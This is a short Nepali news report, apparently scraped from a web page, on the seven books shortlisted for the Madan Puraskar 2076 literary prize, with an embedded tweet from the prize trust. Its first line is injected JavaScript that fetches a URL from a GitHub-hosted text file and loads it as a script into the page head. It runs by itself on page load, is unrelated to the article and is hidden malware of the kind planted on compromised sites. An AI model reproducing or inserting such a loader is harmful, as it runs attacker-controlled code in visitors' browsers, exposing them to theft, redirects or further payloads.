;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन २१,
काठमाडौं । यस वर्षको मदन पुरस्कारको लागि ७ कृति छनोटमा परेका छन्। मदन पुरस्कार गुठीले ‘मदन पुरस्कार-२०७६’ले सार्वजनिक गरेको कृतिमा विमल निभाको जोकर बन्दुक, ललित विष्टको मोहपथ, तीर्थ श्रेष्ठको धर्सैधर्साको चक्रव्यूह, भुवन ढुंगानाको पतित्यक्ता, योगी धर्ममहारसको महारसनीघण्टु, चन्द्रप्रकाश बानियाँको महारानी र शारदा शर्माको ‘यात्रामा’ रहेका छन्।
यो वर्ष गुठीलाई १५१ पुस्तकहरू प्राप्त भएका गुठीले जनाएको छ। यी सात वटा कृतिमध्ये एकलाई २०७६ सालको मदन पुरस्कार प्रदान गरिनेछ। मदन पुरस्कारको राशी ४ लाख रुपैयाँ छ।
छनौटमा परेका सात पुस्तकहरू मध्ये एउटा पुस्तकलाई वर्ष २०७६ को मदन पुरस्कार अर्पण गरिनेछ। https://t.co/pHYfBM1SIj
— Madan Puraskar (@MadanPuraskar) August 5, 2020
फेसबुक प्रतिक्रियाहरु